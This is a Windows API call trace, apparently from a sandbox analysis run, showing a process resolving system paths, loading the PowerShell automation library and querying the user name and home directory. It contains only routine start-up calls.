	[0096.249] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x292c60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0096.249] CoTaskMemFree (pv=0x292c60) 
	[0096.250] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.250] CoTaskMemFree (pv=0x307fb0) 
	[0096.251] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.251] CoTaskMemFree (pv=0x307fb0) 
	[0096.263] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.263] CoTaskMemFree (pv=0x307fb0) 
	[0096.265] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.265] CoTaskMemFree (pv=0x307fb0) 
	[0096.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.266] SetErrorMode (uMode=0x1) returned 0x1
	[0096.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0096.266] SetErrorMode (uMode=0x1) returned 0x1
	[0096.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.266] SetErrorMode (uMode=0x1) returned 0x1
	[0096.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0096.266] SetErrorMode (uMode=0x1) returned 0x1
	[0096.266] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.267] CoTaskMemFree (pv=0x307fb0) 
	[0096.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.272] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0096.272] SetErrorMode (uMode=0x1) returned 0x1
	[0096.272] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0096.272] SetErrorMode (uMode=0x1) returned 0x1
	[0096.272] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0096.272] SetErrorMode (uMode=0x1) returned 0x1
	[0096.272] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0096.273] SetErrorMode (uMode=0x1) returned 0x1
	[0096.273] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0096.273] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0096.273] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0096.273] SetErrorMode (uMode=0x1) returned 0x1
	[0096.273] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0096.273] SetErrorMode (uMode=0x1) returned 0x1
	[0096.273] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0096.273] SetErrorMode (uMode=0x1) returned 0x1
	[0096.273] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0096.274] SetErrorMode (uMode=0x1) returned 0x1
	[0096.274] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0096.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0096.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.274] SetErrorMode (uMode=0x1) returned 0x1
	[0096.274] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0096.274] SetErrorMode (uMode=0x1) returned 0x1
	[0096.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.274] SetErrorMode (uMode=0x1) returned 0x1
	[0096.274] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0096.274] SetErrorMode (uMode=0x1) returned 0x1
	[0096.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.275] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0096.275] SetErrorMode (uMode=0x1) returned 0x1
	[0096.275] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0096.275] SetErrorMode (uMode=0x1) returned 0x1
	[0096.275] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0096.275] SetErrorMode (uMode=0x1) returned 0x1
	[0096.275] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0096.275] SetErrorMode (uMode=0x1) returned 0x1
	[0096.275] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0096.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0096.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.276] SetErrorMode (uMode=0x1) returned 0x1
	[0096.276] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0096.276] SetErrorMode (uMode=0x1) returned 0x1
	[0096.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.276] SetErrorMode (uMode=0x1) returned 0x1
	[0096.276] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d530 | out: lpFileInformation=0x16d530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0096.276] SetErrorMode (uMode=0x1) returned 0x1
	[0096.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0096.278] SetErrorMode (uMode=0x1) returned 0x1
	[0096.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d7f0 | out: lpFileInformation=0x16d7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0096.278] SetErrorMode (uMode=0x1) returned 0x1
	[0096.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.376] CoTaskMemAlloc (cb=0x804) returned 0x1b86a450
	[0096.376] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a450, nSize=0x16db58 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16db58) returned 0x1
	[0096.409] CoTaskMemFree (pv=0x1b86a450) 
	[0096.409] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0096.409] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16db98 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16db98) returned 1
	[0096.409] CoTaskMemFree (pv=0x29eb90) 
	[0096.411] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f718c8*="Available", lpRawData=0x2f71658) returned 1
	[0096.457] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.457] CoTaskMemFree (pv=0x307fb0) 
	[0096.459] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.459] CoTaskMemFree (pv=0x307fb0) 
	[0096.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.468] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.468] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0096.468] CoTaskMemFree (pv=0x307fb0) 
	[0096.468] CoTaskMemAlloc (cb=0x104) returned 0x307fb0
	[0096.468] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x307fb0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0096.468] CoTaskMemFree (pv=0x307fb0) 
	[0096.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.470] GetCurrentProcessId () returned 0x8c4
	[0096.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0096.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
